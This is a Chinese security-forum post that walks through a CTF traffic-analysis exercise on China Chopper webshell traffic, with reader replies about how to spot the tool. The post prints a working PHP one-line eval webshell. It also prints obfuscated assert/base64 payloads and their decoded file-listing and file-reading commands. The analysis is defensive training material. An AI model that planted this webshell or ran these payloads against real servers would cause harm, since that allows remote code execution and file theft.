[原创]流量分析- 中国菜刀-密码应用-看雪-安全社区|安全招聘|kanxue.com

[原创]流量分析- 中国菜刀

2023-8-14 13:31 11029

[原创]流量分析- 中国菜刀

Spider_008 活跃值

2023-8-14 13:31

11029

0x01 系统工具

系统：MacOs 22.5.0
工具：wireshark、010Editor、CyberChef

0x02 实验目标

1.这是一种什么攻击（后门）
2.黑客可能利用的黑客工具
3.后门文件还原
4.后门文件的密码是多少
5.指令发送使用的是什么编码方式
6.传输的文件名叫什么
7.还原出传输的文件
8.文件中有个key，把它写出来，格式:key{}。

0x03 具体步骤

确认数据包大小

总共33条数据，其中A-B通信有一条，对数据进行过滤

总共发现有三组数据包的交互

这是一种什么攻击(后门)

代码审计,右键http追踪第一条POST数据，发现存在名称为123的数组参数，发现$xx里面包含编码后的字符串信息,使用url解码加上base64解码成功获取数据

123=array_map("ass"."ert",array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev".

"al(\\\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEQ9J0M6XFx3d3dyb290XFwnOyRGPUBvcGVuZGlyKCREKTtpZigkRj09TlVMTCl7ZWNobygiRVJST1I6Ly8gUGF0aCBOb3QgRm91bmQgT3IgTm8gUGVybWlzc2lvbiEiKTt9ZWxzZXskTT1OVUxMOyRMPU5VTEw7d2hpbGUoJE49QHJlYWRkaXIoJEYpKXskUD0kRC4nLycuJE47JFQ9QGRhdGUoIlktbS1kIEg6aTpzIixAZmlsZW10aW1lKCRQKSk7QCRFPXN1YnN0cihiYXNlX2NvbnZlcnQoQGZpbGVwZXJtcygkUCksMTAsOCksLTQpOyRSPSJcdCIuJFQuIlx0Ii5AZmlsZXNpemUoJFApLiJcdCIuJEUuIlxuIjtpZihAaXNfZGlyKCRQKSkkTS49JE4uIi8iLiRSO2Vsc2UgJEwuPSROLiRSO31lY2hvICRNLiRMO0BjbG9zZWRpcigkRik7fTtlY2hvKCJYQFkiKTtkaWUoKTs%3D'));\");"

));

字符串解码后的数据

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\wwwroot\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();

查看包含echo函数，该函数为PHP的字符串命令执行函数，存在风险，推测有可能为php的webShell后门
再结合第二组数据分析 X@Y<?php eval($_POST[123]);?> X@Y 确认是PHP的 一句话木马

黑客可能利用的黑客工具什么？

由于解码后发现@ini_set("display_errors","0"),近一步判断user-agent得出结果不是蚁剑

User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)

分析第二组数据，发现包含 eval 函数和$POST

获取X@Y<?php eval($_POST[123]);?> X@Y，根据菜刀特征 eval 和 $POST猜测使用工具为菜刀，而[123]则为payload,这个123可以确认是 array_map数组

还原后门文件

根据第二组数据还原出文件为3.php

第二组数据

123=array_map("ass"."ert",array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEY9IkM6XFx3d3dyb290XFxmbGFnLnRhci5neiI7JGZwPUBmb3BlbigkRiwncicpO2lmKEBmZ2V0YygkZnApKXtAZmNsb3NlKCRmcCk7QHJlYWRmaWxlKCRGKTt9ZWxzZXtlY2hvKCdFUlJPUjovLyBDYW4gTm90IFJlYWQnKTt9O2VjaG8oIlhAWSIpO2RpZSgpOw%3D%3D'));\");"));
 
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='C:\\wwwroot\\3.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();

内容为X@Y<?php eval($_POST[123]);?> X@Y

后门文件的密码是多少

根据第二组会话判断密码为123

指令发送使用的是什么编码方式

该参数值是使用Base64编码的，所以可以利用base64解码可以看到攻击明文。

传输的文件名叫什么

代码审计，分析第三组TCP会话数据发现传输文件名为flag.tar.gz，并且会使用 echo("X@Y")把X@Y字符串当做指令写入到文件内部

第三组数据

123=array_map("ass"."ert",array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev".

"al(\\\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEY9J0M6XFx3d3dyb290XFwzLnBocCc7JFA9QGZvcGVuKCRGLCdyJyk7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oIlhAWSIpO2RpZSgpOw%3D%3D'));\");"

));

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="C:\\wwwroot\\flag.tar.gz";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();

还原出传输的文件

两种方式
- 1. 导出文件
- 1. Wireshark-show Packet Bytes修改start

一、导出文件

查看报文response，疑惑 X@Y文件头信息，发现只是混淆作用

右键查看数据包，定位到文件导出，使用RAW流导出

会提示我们格式不支持

使用010Editor打开修改文件头和文件结尾，一般修改文件头即可

看到 58 40 59,我们查看文件头根本查不到，因为这是混淆我们的,去掉58 40 59后保存,也可以根据 1F 8B 特征判断

修改后保存可以正常打开，解压发现有一个flag.txt文件

二、Wireshark-show Packet Bytes修改start

修改为compressed表示解压缩,后面start 表示字节往右边偏移几位，X@Y就需要偏移三位就可以获取到

Flag

文件获取flag：

Wireshark-show Packet Bytes修改start 获取flag

0x04 小结

流量分析水平得到了提升，对菜刀工具特征有了清晰的认识。

[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》，视频+靶场+题目！助力进入CTF世界

最后于 2023-8-18 08:10 被Spider_008编辑，原因：图片不显示

收藏・12

点赞・2

打赏

最新回复 (7)
北门观雪雪币： 3094 活跃值： (4024) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	北门观雪 2023-8-15 23:06 2 楼 0 图片错误了
Spider_008 雪币： 558 活跃值： (1223) 能力值： ( LV3，RANK：35 ) 在线值：发帖 3 回帖 11 粉丝 3 关注私信	Spider_008 2023-8-16 05:11 3 楼 0 已修复~
秋狝雪币： 19410 活跃值： (29069) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1577 粉丝 30 关注私信	秋狝 2023-8-16 09:12 4 楼 0 感谢分享
忆小陌雪币： 582 活跃值： (425) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 13 粉丝 0 关注私信	忆小陌 2023-8-22 18:12 5 楼 0 牛啊大佬
younguy 雪币： 201 活跃值： (91) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 1 关注私信	younguy 2023-9-8 09:28 6 楼 1 有一个地方没看懂，文中提到“根据菜刀特征 eval 和 $POST猜测使用工具为菜刀”，是怎么根据eval和$post猜测出是菜刀的呢？求答疑
Spider_008 雪币： 558 活跃值： (1223) 能力值： ( LV3，RANK：35 ) 在线值：发帖 3 回帖 11 粉丝 3 关注私信	Spider_008 2023-9-8 20:23 7 楼 1 younguy 有一个地方没看懂，文中提到“根据菜刀特征 eval 和 $POST猜测使用工具为菜刀”，是怎么根据eval和$post猜测出是菜刀的呢？求答疑您好，谈谈我的理解: - 第一：“eval”，eval函数用于传递攻击payload，这是必不可少的； - 第二：`(base64_decode($_POST[z0]))`，是将攻击payload进行Base64解码，因为菜刀默认是将攻击载荷使用`Base64编码`，以免被检测。 - 第三：`&z0=QGluaV9zZXQ...,`该部分是传递攻击payload，此参数z0对应`$_POST[z0]`接收到的数据，该参数值是使用`Base64`编码的，所以可以利用`base64解码`可以看到攻击明文。 - 注意： - 1.有少数时候`eval`方法会被`assert`方法替代 - 2.`$_POST也会被$_GET、$_REQUEST`替代 - 3.`z0`是菜刀默认的参数，这和地方也可能被修改为其他参数名通过三点特征辨认出来菜刀特征，有不对请指出！
younguy 雪币： 201 活跃值： (91) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 1 关注私信	younguy 2023-9-11 14:27 8 楼 0 Spider_008 [em_51]您好，谈谈我的理解: - 第一：“eval”，eval函数用于传递攻击payload，这是必不可少的； - 第二：`(base64_decode($_POST[z0]))`，是将攻 ... 都不算太特征吧，第一eval函数太常见于写各种码了，第二base64在自己写码的时候也可以加上编码，连接不一定通过工具连接，直接访问shell文件的时候传输流量的码也是base64的，至于第三就与第二有关了，这个分析有点像知道答案（菜刀）写过程（特征），当然了，菜刀确实是用base64传输没有错，现在不知道升级没有
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复

Spider_008

发帖

回帖

RANK

关注

私信

他的文章

[原创]KCTF2023 不用BurpSuite的抓包改包思路

[原创]流量分析- 中国菜刀

关于我们

联系我们

企业服务

看雪公众号

最新回复 (7)
北门观雪雪币： 3094 活跃值： (4024) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	北门观雪 2023-8-15 23:06 2 楼 0 图片错误了
Spider_008 雪币： 558 活跃值： (1223) 能力值： ( LV3，RANK：35 ) 在线值：发帖 3 回帖 11 粉丝 3 关注私信	Spider_008 2023-8-16 05:11 3 楼 0 已修复~
秋狝雪币： 19410 活跃值： (29069) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1577 粉丝 30 关注私信	秋狝 2023-8-16 09:12 4 楼 0 感谢分享
忆小陌雪币： 582 活跃值： (425) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 13 粉丝 0 关注私信	忆小陌 2023-8-22 18:12 5 楼 0 牛啊大佬
younguy 雪币： 201 活跃值： (91) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 1 关注私信	younguy 2023-9-8 09:28 6 楼 1 有一个地方没看懂，文中提到“根据菜刀特征 eval 和 $POST猜测使用工具为菜刀”，是怎么根据eval和$post猜测出是菜刀的呢？求答疑
Spider_008 雪币： 558 活跃值： (1223) 能力值： ( LV3，RANK：35 ) 在线值：发帖 3 回帖 11 粉丝 3 关注私信	Spider_008 2023-9-8 20:23 7 楼 1 younguy 有一个地方没看懂，文中提到“根据菜刀特征 eval 和 $POST猜测使用工具为菜刀”，是怎么根据eval和$post猜测出是菜刀的呢？求答疑您好，谈谈我的理解: - 第一：“eval”，eval函数用于传递攻击payload，这是必不可少的； - 第二：`(base64_decode($_POST[z0]))`，是将攻击payload进行Base64解码，因为菜刀默认是将攻击载荷使用`Base64编码`，以免被检测。 - 第三：`&z0=QGluaV9zZXQ...,`该部分是传递攻击payload，此参数z0对应`$_POST[z0]`接收到的数据，该参数值是使用`Base64`编码的，所以可以利用`base64解码`可以看到攻击明文。 - 注意： - 1.有少数时候`eval`方法会被`assert`方法替代 - 2.`$_POST也会被$_GET、$_REQUEST`替代 - 3.`z0`是菜刀默认的参数，这和地方也可能被修改为其他参数名通过三点特征辨认出来菜刀特征，有不对请指出！
younguy 雪币： 201 活跃值： (91) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 1 关注私信	younguy 2023-9-11 14:27 8 楼 0 Spider_008 [em_51]您好，谈谈我的理解: - 第一：“eval”，eval函数用于传递攻击payload，这是必不可少的； - 第二：`(base64_decode($_POST[z0]))`，是将攻 ... 都不算太特征吧，第一eval函数太常见于写各种码了，第二base64在自己写码的时候也可以加上编码，连接不一定通过工具连接，直接访问shell文件的时候传输流量的码也是base64的，至于第三就与第二有关了，这个分析有点像知道答案（菜刀）写过程（特征），当然了，菜刀确实是用base64传输没有错，现在不知道升级没有
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复